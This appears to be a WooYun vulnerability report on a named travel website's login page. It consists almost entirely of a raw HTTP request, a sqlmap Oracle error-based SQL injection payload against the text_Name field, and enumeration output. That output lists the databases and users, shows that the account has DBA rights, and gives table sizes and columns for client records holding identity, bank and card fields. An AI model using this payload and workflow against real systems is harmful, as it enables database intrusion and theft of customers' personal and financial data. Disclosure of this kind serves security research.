WooYun.org

POST /testlogin.aspx HTTP/1.1
Host: datong.china51766.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://datong.china51766.com/
Cookie: pgv_pvi=4732638208; ASP.NET_SessionId=xk5lct55tgedln55shu5er45
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 285
__VIEWSTATE=%2FwEPDwUKLTUzNDczNjI1MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkJ1dHRfTG9naW6yokT4MPBhUuctrFUiU1vx3k%2FZPw%3D%3D&__EVENTVALIDATION=%2FwEWBAKCjZn4CALKh45EAoDQwugHAvmIxIsHfK0haUlHeUrVENyfDoTgcFYpvTk%3D&text_Name=admin&text_Pwd=123456&Butt_Login.x=0&Butt_Login.y=0

sqlmap identified the following injection point(s) with a total of 209 HTTP(s) requests:
---
Parameter: text_Name (POST)
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: __VIEWSTATE=/wEPDwUKLTUzNDczNjI1MGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCkJ1dHRfTG9naW6yokT4MPBhUuctrFUiU1vx3k/ZPw==&__EVENTVALIDATION=/wEWBAKCjZn4CALKh45EAoDQwugHAvmIxIsHfK0haUlHeUrVENyfDoTgcFYpvTk=&text_Name=admin' AND 4378=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(113)||CHR(113)||CHR(106)||CHR(113)||(SELECT (CASE WHEN (4378=4378) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(112)||CHR(107)||CHR(98)||CHR(113)||CHR(62))) FROM DUAL) AND 'tecz'='tecz&text_Pwd=123456&Butt_Login.x=0&Butt_Login.y=0
---
[10:57:28] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008 R2 or 7
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Oracle

available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDSYS
[*] NEWTRAVEL
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

database management system users [32]:
[*] ANONYMOUS
[*] APEX_030200
[*] APEX_PUBLIC_USER
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] DIP
[*] EXFSYS
[*] FLOWS_FILES
[*] MDDATA
[*] MDSYS
[*] MGMT_VIEW
[*] NEWTRAVEL
[*] OLAPSYS
[*] ORACLE_OCM
[*] ORDDATA
[*] ORDPLUGINS
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] OWBSYS_AUDIT
[*] SCOTT
[*] SI_INFORMTN_SCHEMA
[*] SPATIAL_CSW_ADMIN_USR
[*] SPATIAL_WFS_ADMIN_USR
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
[*] XS$NULL

current schema (equivalent to database on Oracle):    'NEWTRAVEL'
current user:    'NEWTRAVEL'

current user is DBA:    True

Database: NEWTRAVEL
[266 tables]
...

Database: NEWTRAVEL
+--------+---------+
| Table  | Entries |
+--------+---------+
| CLIENT | 250655  |
+--------+---------+
Database: NEWTRAVEL
+---------------+---------+
| Table         | Entries |
+---------------+---------+
| CLIENTACCOUNT | 29563   |
+---------------+---------+

Database: NEWTRAVEL
Table: CLIENT
[51 columns]
+--------------+-----------+
| Column       | Type      |
+--------------+-----------+
| IDENTITY     | VARCHAR2  |
| ACCOUNT1     | VARCHAR2  |
| ACCOUNT2     | VARCHAR2  |
| ADDR         | VARCHAR2  |
| APPLYSHOP    | VARCHAR2  |
| BANK1        | VARCHAR2  |
| BANK2        | VARCHAR2  |
| BOSS         | VARCHAR2  |
| CARDNO       | VARCHAR2  |
    ...             ...

Database: NEWTRAVEL
+-------+---------+
| Table | Entries |
+-------+---------+
| USERS | 1730    |
+-------+---------+
Database: NEWTRAVEL
+------------+---------+
| Table      | Entries |
+------------+---------+
| TOUR_GUIDE | 400     |
+------------+---------+